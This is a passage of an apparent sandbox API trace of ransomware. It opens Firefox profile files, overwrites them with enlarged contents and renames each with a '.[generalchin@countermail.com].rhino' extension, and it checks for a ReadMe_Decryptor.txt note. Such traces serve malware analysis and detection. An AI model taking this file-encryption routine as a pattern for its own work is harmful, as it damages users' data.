(HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75fb60 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75fdf0 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb60 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75ff38 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fdf0 | out: hHeap=0x6d0000) returned 1 [0093.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x760120 [0093.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ff38 | out: hHeap=0x6d0000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x7603f0 [0093.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760120 | out: hHeap=0x6d0000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x760828 [0093.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7603f0 | out: hHeap=0x6d0000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75fdf0 [0093.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760828 | out: hHeap=0x6d0000) returned 1 [0093.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x760758 [0093.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fdf0 | out: hHeap=0x6d0000) returned 1 [0093.121] WriteFile (in: hFile=0x104, lpBuffer=0x760758*, nNumberOfBytesToWrite=0xcfb, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x760758*, lpNumberOfBytesWritten=0x2cfa04*=0xcfb, lpOverlapped=0x0) returned 1 [0093.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760758 | out: hHeap=0x6d0000) returned 1 [0093.121] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xcfb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0093.121] CloseHandle (hObject=0x104) returned 1 [0093.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x75fdf0 [0093.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x75ff08 [0093.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fdf0 | out: hHeap=0x6d0000) returned 1 [0093.122] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0093.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ff08 | out: hHeap=0x6d0000) returned 1 [0093.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc68 | out: hHeap=0x6d0000) returned 1 [0093.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d770 [0093.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0093.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0093.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75ef78 [0093.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0093.123] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.123] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.123] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0093.125] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x10000 [0093.125] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10120, nNumberOfBytesToLockHigh=0x0) returned 1 [0093.125] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.125] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0093.127] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.128] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x10000, lpOverlapped=0x0) returned 1 [0093.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0093.129] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0093.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0093.129] GetLastError () returned 0x0 [0093.129] SetLastError (dwErrCode=0x0) [0093.130] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.130] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10023) returned 0x76c980 [0093.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0093.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0093.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.132] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0093.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0093.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0093.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0093.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0093.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df0f8 [0093.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75ef78 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x75f208 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x75f350 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x75f538 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f350 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75f808 [0093.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f538 | out: hHeap=0x6d0000) returned 1 [0093.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x75fc40 [0093.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f808 | out: hHeap=0x6d0000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75f208 [0093.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fc40 | out: hHeap=0x6d0000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x75fb70 [0093.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x760988 [0093.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75fb70 | out: hHeap=0x6d0000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x761ec8 [0093.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760988 | out: hHeap=0x6d0000) returned 1 [0093.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763e90 [0093.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761ec8 | out: hHeap=0x6d0000) returned 1 [0093.144] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x75f208 [0093.144] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763e90 | out: hHeap=0x6d0000) returned 1 [0093.144] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x763958 [0093.145] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.145] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0093.146] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763958 | out: hHeap=0x6d0000) returned 1 [0093.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0093.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0093.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0093.150] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0093.150] WriteFile (in: hFile=0x104, lpBuffer=0x70a660*, nNumberOfBytesToWrite=0x10120, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x70a660*, lpNumberOfBytesWritten=0x2cfa04*=0x10120, lpOverlapped=0x0) returned 1 [0093.221] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0093.221] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10120, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0093.222] CloseHandle (hObject=0x104) returned 1 [0093.223] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x75d698 [0093.223] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x136) returned 0x75f208 [0093.223] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d698 | out: hHeap=0x6d0000) returned 1 [0093.223] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0093.224] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.224] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0093.224] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c980 | out: hHeap=0x6d0000) returned 1 [0093.224] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0093.224] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0093.224] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0093.225] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0093.225] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e97b8 | out: hHeap=0x6d0000) returned 1 [0093.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.225] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0093.225] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0xce [0093.225] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1ee, nNumberOfBytesToLockHigh=0x0) returned 1 [0093.225] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.226] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0093.227] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.228] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0xce, lpOverlapped=0x0) returned 1 [0093.228] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0093.228] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.228] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0093.228] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0093.228] GetLastError () returned 0x0 [0093.229] SetLastError (dwErrCode=0x0) [0093.229] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xce) returned 0x75d770 [0093.229] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x75ef78 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x75f080 [0093.229] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.229] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0093.229] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0093.229] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0093.229] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0093.229] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0093.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df0f8 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df0f8 | out: hHeap=0x6d0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0093.230] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x75ef78 [0093.230] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0093.231] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1ee) returned 0x75f208 [0093.231] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0093.231] WriteFile (in: hFile=0x104, lpBuffer=0x75f208*, nNumberOfBytesToWrite=0x1ee, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x75f208*, lpNumberOfBytesWritten=0x2cfa04*=0x1ee, lpOverlapped=0x0) returned 1 [0093.231] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.231] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1ee, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0093.231] CloseHandle (hObject=0x104) returned 1 [0093.232] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0093.232] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x75f208 [0093.232] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0093.232] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0093.233] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f208 | out: hHeap=0x6d0000) returned 1 [0093.233] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f080 | out: hHeap=0x6d0000) returned 1 [0093.233] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d770 | out: hHeap=0x6d0000) returned 1 [0093.233] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e97b8 [0093.233] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0093.233] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0093.233] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75ef78 [0093.233] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 